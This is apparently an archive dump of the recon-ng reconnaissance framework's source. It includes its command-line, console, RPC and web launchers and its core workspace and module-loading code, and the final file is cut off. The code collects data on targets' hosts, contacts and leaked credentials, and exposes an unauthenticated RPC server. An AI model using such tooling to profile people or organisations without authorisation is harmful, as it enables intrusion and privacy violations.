(@e2fsck) and Tim Tomes (@LaNMaSteR53)', 'version': 'v0.0.2', 'description': 'Creates a XML report.', 'options': ( ('tables', 'hosts, contacts, credentials', True, 'comma delineated list of tables'), ('filename', os.path.join(BaseModule.workspace, 'results.xml'), True, 'path and filename for report output'), ), } def module_run(self): filename = self.options['filename'] with codecs.open(filename, 'wb', encoding='utf-8') as outfile: # build a list of table names tables = [x.strip() for x in self.options['tables'].split(',')] data_dict = {} cnt = 0 for table in tables: data_dict[table] = [] columns = [x[0] for x in self.get_columns(table)] rows = self.query('SELECT "%s" FROM "%s" ORDER BY 1' % ('", "'.join(columns), table)) for row in rows: row_dict = {} for i in range(0,len(columns)): row_dict[columns[i]] = row[i] data_dict[table].append(row_dict) cnt += 1 # write the xml to a file reparsed = parseString(dicttoxml(data_dict)) outfile.write(reparsed.toprettyxml(indent=' '*4)) self.output('%d records added to \'%s\'.' % (cnt, filename)) ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/recon-cli���������������������������������������������������������0000775�0000000�0000000�00000006436�13122657244�0017766�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python import argparse import sys # prevent creation of compiled bytecode files sys.dont_write_bytecode = True from recon.core import base from recon.core.framework import Colors def output(string): print('%s[*]%s %s' % (Colors.B, Colors.N, string)) def recon_cli(args): x = base.Recon(mode=base.Mode.CLI) # check for and run version check if args.check: if not x.version_check(): return # set given workspace if args.workspace: x.init_workspace(args.workspace) print('WORKSPACE => %s' % (args.workspace)) # run given global commands for command in args.global_commands: print('GLOBAL COMMAND => %s' % (command)) x.onecmd(command) # set given global options for option in args.goptions: param = ' '.join(option.split('=')) x.do_set(param) # if requested, show global options and exit if args.gshow: x.do_show('options') return # if requested, show modules and exit if args.show_modules: x.do_show('modules') return # exit if module not specified if not args.module: output('No module provided.') return # load the module y = x.do_load(args.module) # exit if module not successfully loaded if not y: return print('MODULE => %s' % (args.module)) # run given module commands for command in args.module_commands: print('MODULE COMMAND => %s' % (command)) y.onecmd(command) # set given module options for option in args.options: param = ' '.join(option.split('=')) y.do_set(param) # if requested, show module options and exit if args.show: y.do_show('options') return if args.run: # run the module y.do_run(None) description = '%%(prog)s - %s %s' % (base.__author__, base.__email__) parser = argparse.ArgumentParser(description=description, version=base.__version__) parser.add_argument('-w', help='load/create a workspace', metavar='workspace', dest='workspace', action='store') parser.add_argument('-C', help='runs a command at the global context', metavar='command', dest='global_commands' ,default=[], action='append') parser.add_argument('-c', help='runs a command at the module context (pre-run)', metavar='command', dest='module_commands' ,default=[], action='append') parser.add_argument('-G', help='show available global options', dest='gshow', default=False, action='store_true') parser.add_argument('-g', help='set a global option (can be used more than once)', metavar='name=value', dest='goptions', default=[], action='append') parser.add_argument('-M', help='show modules', dest='show_modules', default=False, action='store_true') parser.add_argument('-m', help='specify the module', metavar='module', dest='module', action='store') parser.add_argument('-O', help='show available module options', dest='show', default=False, action='store_true') parser.add_argument('-o', help='set a module option (can be used more than once)', metavar='name=value', dest='options', default=[], action='append') parser.add_argument('-x', help='run the module', dest='run', default=False, action='store_true') parser.add_argument('--no-check', help='disable version check', dest='check', default=True, action='store_false') args = parser.parse_args() recon_cli(args) ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/recon-ng����������������������������������������������������������0000775�0000000�0000000�00000003723�13122657244�0017617�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python import argparse import re import sys # prevent creation of compiled bytecode files sys.dont_write_bytecode = True from recon.core import base from recon.core.framework import Colors def recon_ui(args): # set up command completion try: import readline except ImportError: print('%s[!] Module \'readline\' not available. Tab complete disabled.%s' % (Colors.R, Colors.N)) else: import rlcompleter if 'libedit' in readline.__doc__: readline.parse_and_bind('bind ^I rl_complete') else: readline.parse_and_bind('tab: complete') readline.set_completer_delims(re.sub('[/-]', '', readline.get_completer_delims())) # for possible future use to format command completion output #readline.set_completion_display_matches_hook(display_hook) x = base.Recon(base.Mode.CONSOLE) # check for and run version check if args.check: if not x.version_check(): return # check for and enable analytics if args.analytics: x.analytics = True # check for and load workspace if args.workspace: x.init_workspace(args.workspace) # check for and run script session if args.script_file: x.do_resource(args.script_file) try: x.cmdloop() except KeyboardInterrupt: print('') description = '%%(prog)s - %s %s' % (base.__author__, base.__email__) parser = argparse.ArgumentParser(description=description, version=base.__version__) parser.add_argument('-w', help='load/create a workspace', metavar='workspace', dest='workspace', action='store') parser.add_argument('-r', help='load commands from a resource file', metavar='filename', dest='script_file', action='store') parser.add_argument('--no-check', help='disable version check', dest='check', default=True, action='store_false') parser.add_argument('--no-analytics', help='disable analytics reporting', dest='analytics', default=True, action='store_false') args = parser.parse_args() recon_ui(args) ���������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/recon-rpc���������������������������������������������������������0000775�0000000�0000000�00000006003�13122657244�0017771�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python __author__ = "Anthony Miller-Rhodes (@amillerrhodes)" import uuid import argparse import sys # prevent creation of compiled bytecode files sys.dont_write_bytecode = True from recon.core import base def recon_rpc(args): if args.server_type.lower() == 'xmlrpc': from SimpleXMLRPCServer import SimpleXMLRPCServer RPCServer = SimpleXMLRPCServer server = RPCServer((args.address, args.port), allow_none=True) elif args.server_type.lower() == 'jsonrpc': from jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer RPCServer = SimpleJSONRPCServer server = RPCServer((args.address, args.port)) else: print('[!] Invalid RPC server type \'%s\'.' % (args.server_type)) return server.register_multicall_functions() server.register_instance(ReconState()) print("[+] Serving on %s:%d" % (args.address, args.port)) try: server.serve_forever() except KeyboardInterrupt: print('') class ReconState: def __init__(self): self.sessions = {} def init(self): sid = str(uuid.uuid4()) self.sessions[sid] = { "recon": base.Recon(base.Mode.CLI), "module": None } self.sessions[sid]["module"] = self.sessions[sid]["recon"] return sid def _fetch_results(self, sid): results = self.sessions[sid]["module"].rpc_cache[:] self.sessions[sid]["module"].rpc_cache = [] return results def use(self, param, sid): mod = self.sessions[sid]["recon"].do_use(param) self.sessions[sid]["module"] = mod def global_set(self, var, param, sid): self.sessions[sid]["recon"].do_set(var + " " + param) def set(self, var, param, sid): self.sessions[sid]["module"].do_set(var + " " + param) def unset(self, var, sid): self.sessions[sid]["module"].do_unset(var) def run(self, sid): self.sessions[sid]["module"].do_run(None) return self._fetch_results(sid) def add(self, table, param, sid): self.sessions[sid]["module"].do_add(table + " " + param) return self._fetch_results(sid) def delete(self, table, param, sid): self.sessions[sid]["module"].do_delete(table + " " + param) def show(self, param, sid): if param in self.sessions[sid]["module"].get_tables(): return self.sessions[sid]["module"].query('SELECT ROWID, * FROM %s ORDER BY 1' % (param)) def workspace(self, param, sid): self.sessions[sid]["recon"].init_workspace(param) parser = argparse.ArgumentParser() parser.add_argument("-t", type=str, action="store", default='jsonrpc', help="Set RPC server type", dest="server_type", metavar="[jsonrpc|xmlrpc]") parser.add_argument("-a", type=str, action="store", default='0.0.0.0', help="Set RPC server bind address", dest="address", metavar="address") parser.add_argument("-p", type=int, action="store", default=4141, help="Set RPC server port", dest="port", metavar="port") args = parser.parse_args() recon_rpc(args) �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/recon-web���������������������������������������������������������0000775�0000000�0000000�00000000140�13122657244�0017756�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python from recon.core.web import app if __name__ == '__main__': app.run() ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/recon/������������������������������������������������������������0000775�0000000�0000000�00000000000�13122657244�0017262�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/recon/__init__.py�������������������������������������������������0000664�0000000�0000000�00000000000�13122657244�0021361�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/recon/core/�������������������������������������������������������0000775�0000000�0000000�00000000000�13122657244�0020212�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/recon/core/__init__.py��������������������������������������������0000664�0000000�0000000�00000000000�13122657244�0022311�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/recon/core/base.py������������������������������������������������0000664�0000000�0000000�00000060154�13122657244�0021504�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from __future__ import print_function __author__ = 'Tim Tomes (@LaNMaSteR53)' __email__ = 'tjt1980[at]gmail.com' import errno import imp import json import os import random import re import shutil import sys import __builtin__ # import framework libs from recon.core import framework # set the __version__ variable based on the VERSION file execfile(os.path.join(sys.path[0], 'VERSION')) # using stdout to spool causes tab complete issues # therefore, override print function # use a lock for thread safe console and spool output from threading import Lock _print_lock = Lock() # spooling system def spool_print(*args, **kwargs): with _print_lock: if framework.Framework._spool: framework.Framework._spool.write('%s\n' % (args[0])) framework.Framework._spool.flush() if 'console' in kwargs and kwargs['console'] is False: return # new print function must still use the old print function via the backup __builtin__._print(*args, **kwargs) # make a builtin backup of the original print function __builtin__._print = print # override the builtin print function with the new print function __builtin__.print = spool_print #================================================= # BASE CLASS #================================================= class Recon(framework.Framework): def __init__(self, mode): framework.Framework.__init__(self, 'base') self._mode = mode self._name = 'recon-ng' self._prompt_template = '%s[%s] > ' self._base_prompt = self._prompt_template % ('', self._name) # establish dynamic paths for framework elements self.app_path = framework.Framework.app_path = sys.path[0] self.data_path = framework.Framework.data_path = os.path.join(self.app_path, 'data') self.core_path = framework.Framework.core_path = os.path.join(self.app_path, 'core') self.options = self._global_options self._init_global_options() self._init_home() self.init_workspace('default') if self._mode == Mode.CONSOLE: self.show_banner() self.analytics = False #================================================== # SUPPORT METHODS #================================================== def version_check(self): try: pattern = "'(\d+\.\d+\.\d+[^']*)'" remote = re.search(pattern, self.request('https://bitbucket.org/LaNMaSteR53/recon-ng/raw/master/VERSION').raw).group(1) local = re.search(pattern, open('VERSION').read()).group(1) if remote != local: self.alert('Your version of Recon-ng does not match the latest release.') self.alert('Please update or use the \'--no-check\' switch to continue using the old version.') if remote.split('.')[0] != local.split('.')[0]: self.alert('Read the migration notes for pre-requisites before upgrading.') self.output('Migration Notes: https://bitbucket.org/LaNMaSteR53/recon-ng/wiki/Usage%20Guide#!migration-notes') self.output('Remote version: %s' % (remote)) self.output('Local version: %s' % (local)) return local == remote except: return True def _send_analytics(self, cd): try: cid_path = os.path.join(self._home, '.cid') if not os.path.exists(cid_path): # create the cid and file import uuid with open(cid_path, 'w') as fp: fp.write(str(uuid.uuid4())) with open(cid_path) as fp: cid = fp.read().strip() data = { 'v': 1, 'tid': 'UA-52269615-2', 'cid': cid, 't': 'screenview', 'an': 'Recon-ng', 'av': __version__, 'cd': cd } self.request('http://www.google-analytics.com/collect', payload=data) except: pass def _init_global_options(self): self.register_option('nameserver', '8.8.8.8', True, 'nameserver for DNS interrogation') self.register_option('proxy', None, False, 'proxy server (address:port)') self.register_option('threads', 10, True, 'number of threads (where applicable)') self.register_option('timeout', 10, True, 'socket timeout (seconds)') self.register_option('user-agent', 'Recon-ng/v%s' % (__version__.split('.')[0]), True, 'user-agent string') self.register_option('verbosity', 1, True, 'verbosity level (0 = minimal, 1 = verbose, 2 = debug)') def _init_home(self): self._home = framework.Framework._home = os.path.join(os.path.expanduser('~'), '.recon-ng') # initialize home folder if not os.path.exists(self._home): os.makedirs(self._home) # initialize keys database self._query_keys('CREATE TABLE IF NOT EXISTS keys (name TEXT PRIMARY KEY, value TEXT)') def _load_modules(self): self.loaded_category = {} self._loaded_modules = framework.Framework._loaded_modules # crawl the module directory and build the module tree for path in [os.path.join(x, 'modules') for x in (self.app_path, self._home)]: for dirpath, dirnames, filenames in os.walk(path): # remove hidden files and directories filenames = [f for f in filenames if not f[0] == '.'] dirnames[:] = [d for d in dirnames if not d[0] == '.'] if len(filenames) > 0: for filename in [f for f in filenames if f.endswith('.py')]: is_loaded = self._load_module(dirpath, filename) mod_category = 'disabled' if is_loaded: mod_category = re.search('/modules/([^/]*)', dirpath).group(1) # store the resulting category statistics if not mod_category in self.loaded_category: self.loaded_category[mod_category] = 0 self.loaded_category[mod_category] += 1 def _load_module(self, dirpath, filename): mod_name = filename.split('.')[0] mod_dispname = '/'.join(re.split('/modules/', dirpath)[-1].split('/') + [mod_name]) mod_loadname = mod_dispname.replace('/', '_') mod_loadpath = os.path.join(dirpath, filename) mod_file = open(mod_loadpath) try: # import the module into memory mod = imp.load_source(mod_loadname, mod_loadpath, mod_file) __import__(mod_loadname) # add the module to the framework's loaded modules self._loaded_modules[mod_dispname] = sys.modules[mod_loadname].Module(mod_dispname) return True except ImportError as e: # notify the user of missing dependencies self.error('Module \'%s\' disabled. Dependency required: \'%s\'' % (mod_dispname, e.message[16:])) except: # notify the user of errors self.print_exception() self.error('Module \'%s\' disabled.' % (mod_dispname)) # remove the module from the framework's loaded modules self._loaded_modules.pop(mod_dispname, None) return False def _menu_egg(self, params): eggs = [ 'Really? A menu option? Try again.', 'You clearly need \'help\'.', 'That makes no sense to me.', '*grunt* *grunt* Nope. I got nothin\'.', 'Wait for it...', 'This is not the Social Engineering Toolkit.', 'Don\'t you think if that worked the numbers would at least be in order?', 'Reserving that option for the next-NEXT generation of the framework.', 'You\'ve clearly got the wrong framework. Attempting to start SET...', 'Your mother called. She wants her menu driven UI back.', 'What\'s the samurai password?' ] print(random.choice(eggs)) return #================================================== # WORKSPACE METHODS #================================================== def init_workspace(self, workspace): workspace = os.path.join(self._home, 'workspaces', workspace) new = False try: os.makedirs(workspace) new = True except OSError as e: if e.errno != errno.EEXIST: self.error(e.__str__()) return False # set workspace attributes self.workspace = framework.Framework.workspace = workspace self.prompt = self._prompt_template % (self._base_prompt[:-3], self.workspace.split('/')[-1]) # configure new database or conduct migrations self._create_db() if new else self._migrate_db() # load workspace configuration self._init_global_options() self._load_config() # load modules after config to populate options self._load_modules() return True def delete_workspace(self, workspace): path = os.path.join(self._home, 'workspaces', workspace) try: shutil.rmtree(path) except OSError: return False if workspace == self.workspace.split('/')[-1]: self.init_workspace('default') return True def _get_workspaces(self): dirnames = [] path = os.path.join(self._home, 'workspaces') for name in os.listdir(path): if os.path.isdir(os.path.join(path, name)): dirnames.append(name) return dirnames def _get_snapshots(self): snapshots = [] for f in os.listdir(self.workspace): if re.search('^snapshot_\d{14}.db$', f): snapshots.append(f) return snapshots def _create_db(self): self.query('CREATE TABLE IF NOT EXISTS domains (domain TEXT, module TEXT)') self.query('CREATE TABLE IF NOT EXISTS companies (company TEXT, description TEXT, module TEXT)') self.query('CREATE TABLE IF NOT EXISTS netblocks (netblock TEXT, module TEXT)') self.query('CREATE TABLE IF NOT EXISTS locations (latitude TEXT, longitude TEXT, street_address TEXT, module TEXT)') self.query('CREATE TABLE IF NOT EXISTS vulnerabilities (host TEXT, reference TEXT, example TEXT, publish_date TEXT, category TEXT, status TEXT, module TEXT)') self.query('CREATE TABLE IF NOT EXISTS ports (ip_address TEXT, host TEXT, port TEXT, protocol TEXT, module TEXT)') self.query('CREATE TABLE IF NOT EXISTS hosts (host TEXT, ip_address TEXT, region TEXT, country TEXT, latitude TEXT, longitude TEXT, module TEXT)') self.query('CREATE TABLE IF NOT EXISTS contacts (first_name TEXT, middle_name TEXT, last_name TEXT, email TEXT, title TEXT, region TEXT, country TEXT, module TEXT)') self.query('CREATE TABLE IF NOT EXISTS credentials (username TEXT, password TEXT, hash TEXT, type TEXT, leak TEXT, module TEXT)') self.query('CREATE TABLE IF NOT EXISTS leaks (leak_id TEXT, description TEXT, source_refs TEXT, leak_type TEXT, title TEXT, import_date TEXT, leak_date TEXT, attackers TEXT, num_entries TEXT, score TEXT, num_domains_affected TEXT, attack_method TEXT, target_industries TEXT, password_hash TEXT, password_type TEXT, targets TEXT, media_refs TEXT, module TEXT)') self.query('CREATE TABLE IF NOT EXISTS pushpins (source TEXT, screen_name TEXT, profile_name TEXT, profile_url TEXT, media_url TEXT, thumb_url TEXT, message TEXT, latitude TEXT, longitude TEXT, time TEXT, module TEXT)') self.query('CREATE TABLE IF NOT EXISTS profiles (username TEXT, resource TEXT, url TEXT, category TEXT, notes TEXT, module TEXT)') self.query('CREATE TABLE IF NOT EXISTS repositories (name TEXT, owner TEXT, description TEXT, resource TEXT, category TEXT, url TEXT, module TEXT)') self.query('CREATE TABLE IF NOT EXISTS dashboard (module TEXT PRIMARY KEY, runs INT)') self.query('PRAGMA user_version = 8') def _migrate_db(self): db_version = lambda self: self.query('PRAGMA user_version')[0][0] if db_version(self) == 0: # add mname column to contacts table tmp = self.get_random_str(20) self.query('ALTER TABLE contacts RENAME TO %s' % (tmp)) self.query('CREATE TABLE contacts (fname TEXT, mname TEXT, lname TEXT, email TEXT, title TEXT, region TEXT, country TEXT)') self.query('INSERT INTO contacts (fname, lname, email, title, region, country) SELECT fname, lname, email, title, region, country FROM %s' % (tmp)) self.query('DROP TABLE %s' % (tmp)) self.query('PRAGMA user_version = 1') if db_version(self) == 1: # rename name columns tmp = self.get_random_str(20) self.query('ALTER TABLE contacts RENAME TO %s' % (tmp)) self.query('CREATE TABLE contacts (first_name TEXT, middle_name TEXT, last_name TEXT, email TEXT, title TEXT, region TEXT, country TEXT)') self.query('INSERT INTO contacts (first_name, middle_name, last_name, email, title, region, country) SELECT fname, mname, lname, email, title, region, country FROM %s' % (tmp)) self.query('DROP TABLE %s' % (tmp)) # rename pushpin table self.query('ALTER TABLE pushpin RENAME TO pushpins') # add new tables self.query('CREATE TABLE IF NOT EXISTS domains (domain TEXT)') self.query('CREATE TABLE IF NOT EXISTS companies (company TEXT, description TEXT)') self.query('CREATE TABLE IF NOT EXISTS netblocks (netblock TEXT)') self.query('CREATE TABLE IF NOT EXISTS locations (latitude TEXT, longitude TEXT)') self.query('CREATE TABLE IF NOT EXISTS vulnerabilities (host TEXT, reference TEXT, example TEXT, publish_date TEXT, category TEXT)') self.query('CREATE TABLE IF NOT EXISTS ports (ip_address TEXT, host TEXT, port TEXT, protocol TEXT)') self.query('CREATE TABLE IF NOT EXISTS leaks (leak_id TEXT, description TEXT, source_refs TEXT, leak_type TEXT, title TEXT, import_date TEXT, leak_date TEXT, attackers TEXT, num_entries TEXT, score TEXT, num_domains_affected TEXT, attack_method TEXT, target_industries TEXT, password_hash TEXT, targets TEXT, media_refs TEXT)') self.query('PRAGMA user_version = 2') if db_version(self) == 2: # add street_address column to locations table self.query('ALTER TABLE locations ADD COLUMN street_address TEXT') self.query('PRAGMA user_version = 3') if db_version(self) == 3: # account for db_version bug if 'creds' in self.get_tables(): # rename creds table self.query('ALTER TABLE creds RENAME TO credentials') self.query('PRAGMA user_version = 4') if db_version(self) == 4: # add status column to vulnerabilities table if 'status' not in [x[0] for x in self.get_columns('vulnerabilities')]: self.query('ALTER TABLE vulnerabilities ADD COLUMN status TEXT') # add module column to all tables for table in ['domains', 'companies', 'netblocks', 'locations', 'vulnerabilities', 'ports', 'hosts', 'contacts', 'credentials', 'leaks', 'pushpins']: if 'module' not in [x[0] for x in self.get_columns(table)]: self.query('ALTER TABLE %s ADD COLUMN module TEXT' % (table)) self.query('PRAGMA user_version = 5') if db_version(self) == 5: # add profile table self.query('CREATE TABLE IF NOT EXISTS profiles (username TEXT, resource TEXT, url TEXT, category TEXT, notes TEXT, module TEXT)') self.query('PRAGMA user_version = 6') if db_version(self) == 6: # add profile table self.query('CREATE TABLE IF NOT EXISTS repositories (name TEXT, owner TEXT, description TEXT, resource TEXT, category TEXT, url TEXT, module TEXT)') self.query('PRAGMA user_version = 7') if db_version(self) == 7: # add password_type column to leaks table self.query('ALTER TABLE leaks ADD COLUMN password_type TEXT') self.query('UPDATE leaks SET password_type=\'unknown\'') self.query('PRAGMA user_version = 8') #================================================== # SHOW METHODS #================================================== def show_banner(self): banner = open(os.path.join(self.data_path, 'banner.txt')).read() banner_len = len(max(banner.split('\n'), key=len)) print(banner) print('{0:^{1}}'.format('%s[%s v%s, %s]%s' % (framework.Colors.O, self._name, __version__, __author__, framework.Colors.N), banner_len+8)) # +8 compensates for the color bytes print('') counts = [(self.loaded_category[x], x) for x in self.loaded_category] count_len = len(max([str(x[0]) for x in counts], key=len)) for count in sorted(counts, reverse=True): cnt = '[%d]' % (count[0]) print('%s%s %s modules%s' % (framework.Colors.B, cnt.ljust(count_len+2), count[1].title(), framework.Colors.N)) # create dynamic easter egg command based on counts setattr(self, 'do_%d' % count[0], self._menu_egg) print('') def show_workspaces(self): self.do_workspaces('list') #================================================== # COMMAND METHODS #================================================== def do_reload(self, params): '''Reloads all modules''' self.output('Reloading...') self._load_modules() def do_workspaces(self, params): '''Manages workspaces''' if not params: self.help_workspaces() return params = params.split() arg = params.pop(0).lower() if arg == 'list': self.table([[x] for x in self._get_workspaces()], header=['Workspaces']) elif arg in ['add', 'select']: if len(params) == 1: if not self.init_workspace(params[0]): self.output('Unable to initialize \'%s\' workspace.' % (params[0])) else: print('Usage: workspace [add|select] <name>') elif arg == 'delete': if len(params) == 1: if not self.delete_workspace(params[0]): self.output('Unable to delete \'%s\' workspace.' % (params[0])) else: print('Usage: workspace delete <name>') else: self.help_workspaces() def do_snapshots(self, params): '''Manages workspace snapshots''' if not params: self.help_snapshots() return params = params.split() arg = params.pop(0).lower() if arg == 'list': snapshots = self._get_snapshots() if snapshots: self.table([[x] for x in snapshots], header=['Snapshots']) else: self.output('This workspace has no snapshots.') elif arg == 'take': from datetime import datetime snapshot = 'snapshot_%s.db' % (datetime.strftime(datetime.now(), '%Y%m%d%H%M%S')) src = os.path.join(self.workspace, 'data.db') dst = os.path.join(self.workspace, snapshot) shutil.copyfile(src, dst) self.output('Snapshot created: %s' % (snapshot)) elif arg == 'load': if len(params) == 1: # warn about overwriting current state if params[0] in self._get_snapshots(): src = os.path.join(self.workspace, params[0]) dst = os.path.join(self.workspace, 'data.db') shutil.copyfile(src, dst) self.output('Snapshot loaded: %s' % (params[0])) else: self.error('No snapshot named \'%s\'.' % (params[0])) else: print('Usage: snapshots [load] <name>') elif arg == 'delete': if len(params) == 1: if params[0] in self._get_snapshots(): os.remove(os.path.join(self.workspace, params[0])) self.output('Snapshot removed: %s' % (params[0])) else: self.error('No snapshot named \'%s\'.' % (params[0])) else: print('Usage: snapshots [delete] <name>') else: self.help_snapshots() def do_load(self, params): '''Loads specified module''' try: self._validate_options() except framework.FrameworkException as e: self.error(e.message) return if not params: self.help_load() return # finds any modules that contain params modules = [params] if params in self._loaded_modules else [x for x in self._loaded_modules if params in x] # notify the user if none or multiple modules are found if len(modules) != 1: if not modules: self.error('Invalid module name.') else: self.output('Multiple modules match \'%s\'.' % params) self.show_modules(modules) return # load the module mod_dispname = modules[0] # loop to support reload logic while True: y = self._loaded_modules[mod_dispname] # send analytics information mod_loadpath = os.path.abspath(sys.modules[y.__module__].__file__) if (self._home not in mod_loadpath) and self.analytics: self._send_analytics(mod_dispname) # return the loaded module if in command line mode if self._mode == Mode.CLI: return y # begin a command loop y.prompt = self._prompt_template % (self.prompt[:-3], mod_dispname.split('/')[-1]) try: y.cmdloop() except KeyboardInterrupt: print('') if y._exit == 1: return True if y._reload == 1: self.output('Reloading...') # reload the module in memory is_loaded = self._load_module(os.path.dirname(mod_loadpath), os.path.basename(mod_loadpath)) if is_loaded: # reload the module in the framework continue # shuffle category counts? break do_use = do_load #================================================== # HELP METHODS #================================================== def help_workspaces(self): print(getattr(self, 'do_workspaces').__doc__) print('') print('Usage: workspaces [list|add|select|delete]') print('') def help_snapshots(self): print(getattr(self, 'do_snapshots').__doc__) print('') print('Usage: snapshots [list|take|load|delete]') print('') #================================================== # COMPLETE METHODS #================================================== def complete_workspaces(self, text, line, *ignored): args = line.split() options = ['list', 'add', 'select', 'delete'] if 1 < len(args) < 4: if args[1].lower() in options[2:]: return [x for x in self._get_workspaces() if x.startswith(text)] if args[1].lower() in options[:2]: return [] return [x for x in options if x.startswith(text)] def complete_snapshots(self, text, line, *ignored): args = line.split() options = ['list', 'take', 'load', 'delete'] if 1 < len(args) < 4: if args[1].lower() in options[2:]: return [x for x in self._get_snapshots() if x.startswith(text)] if args[1].lower() in options[:2]: return [] return [x for x in options if x.startswith(text)] #================================================= # SUPPORT CLASSES #================================================= class Mode(object): '''Contains constants that represent the state of the interpreter.''' CONSOLE = 0 CLI = 1 GUI = 2 def __init__(self): raise NotImplementedError('This class should never be instantiated.') ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/recon/core/framework.py�������������������������������������������0000664�0000000�0000000�00000140744�13122657244�0022573�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from __future__ import print_function from contextlib import closing import cmd import codecs import inspect import json import os import random import re import socket import sqlite3 import string import subprocess import sys import traceback # framework libs from recon.utils.requests import Request #================================================= # SUPPORT CLASSES #================================================= class FrameworkException(Exception): pass class Colors(object): N = '\033[m' # native R = '\033[31m' # red G = '\033[32m' # green O = '\033[33m' # orange B = '\033[34m' # blue class Options(dict): def __init__(self, *args, **kwargs): self.required = {} self.description = {} super(Options, self).__init__(*args, **kwargs) def __setitem__(self, name, value): super(Options, self).__setitem__(name, self._autoconvert(value)) def __delitem__(self, name): super(Options, self).__delitem__(name) if name in self.required: del self.required[name] if name in self.description: del self.description[name] def _boolify(self, value): # designed to throw an exception if value is not a string representation of a boolean return {'true':True, 'false':False}[value.lower()] def _autoconvert(self, value): if value in (None, True, False): return value elif (isinstance(value, basestring)) and value.lower() in ('none', "''", '""'): return None orig = value for fn in (self._boolify, int, float): try: value = fn(value) break except ValueError: pass except KeyError: pass except AttributeError: pass if type(value) is int and '.' in str(orig): return float(orig) return value def init_option(self, name, value=None, required=False, description=''): self[name] = value self.required[name] = required self.description[name] = description def serialize(self): data = {} for key in self: data[key] = self[key] return data #================================================= # FRAMEWORK CLASS #================================================= class Framework(cmd.Cmd): prompt = '>>>' # mode flags _script = 0 _load = 0 # framework variables _global_options = Options() _loaded_modules = {} app_path = '' data_path = '' core_path = '' workspace = '' _home = '' _record = None _spool = None _summary_counts = {} def __init__(self, params): cmd.Cmd.__init__(self) self._modulename = params self.ruler = '-' self.spacer = ' ' self.time_format = '%Y-%m-%d %H:%M:%S' self.nohelp = '%s[!] No help on %%s%s' % (Colors.R, Colors.N) self.do_help.__func__.__doc__ = '''Displays this menu''' self.doc_header = 'Commands (type [help|?] <topic>):' self.rpc_cache = [] self._exit = 0 #================================================== # CMD OVERRIDE METHODS #================================================== def default(self, line): self.do_shell(line) def emptyline(self): # disables running of last command when no command is given # return flag to tell interpreter to continue return 0 def precmd(self, line): if Framework._load: print('\r', end='') if Framework._script: print('%s' % (line)) if Framework._record: recorder = codecs.open(Framework._record, 'ab', encoding='utf-8') recorder.write(('%s\n' % (line)).encode('utf-8')) recorder.flush() recorder.close() if Framework._spool: Framework._spool.write('%s%s\n' % (self.prompt, line)) Framework._spool.flush() return line def onecmd(self, line): cmd, arg, line = self.parseline(line) if not line: return self.emptyline() if line == 'EOF': # reset stdin for raw_input sys.stdin = sys.__stdin__ Framework._script = 0 Framework._load = 0 return 0 if cmd is None: return self.default(line) self.lastcmd = line if cmd == '': return self.default(line) else: try: func = getattr(self, 'do_' + cmd) except AttributeError: return self.default(line) return func(arg) # make help menu more attractive def print_topics(self, header, cmds, cmdlen, maxcol): if cmds: self.stdout.write("%s\n"%str(header)) if self.ruler: self.stdout.write("%s\n"%str(self.ruler * len(header))) for cmd in cmds: self.stdout.write("%s %s\n" % (cmd.ljust(15), getattr(self, 'do_' + cmd).__doc__)) self.stdout.write("\n") #================================================== # SUPPORT METHODS #================================================== def to_unicode_str(self, obj, encoding='utf-8'): # checks if obj is a string and converts if not if not isinstance(obj, basestring): obj = str(obj) obj = self.to_unicode(obj, encoding) return obj def to_unicode(self, obj, encoding='utf-8'): # checks if obj is a unicode string and converts if not if isinstance(obj, basestring): if not isinstance(obj, unicode): obj = unicode(obj, encoding) return obj def is_hash(self, hashstr): hashdict = [ {'pattern': '^[a-fA-F0-9]{32}$', 'type': 'MD5'}, {'pattern': '^[a-fA-F0-9]{16}$', 'type': 'MySQL'}, {'pattern': '^\*[a-fA-F0-9]{40}$', 'type': 'MySQL5'}, {'pattern': '^[a-fA-F0-9]{40}$', 'type': 'SHA1'}, {'pattern': '^[a-fA-F0-9]{56}$', 'type': 'SHA224'}, {'pattern': '^[a-fA-F0-9]{64}$', 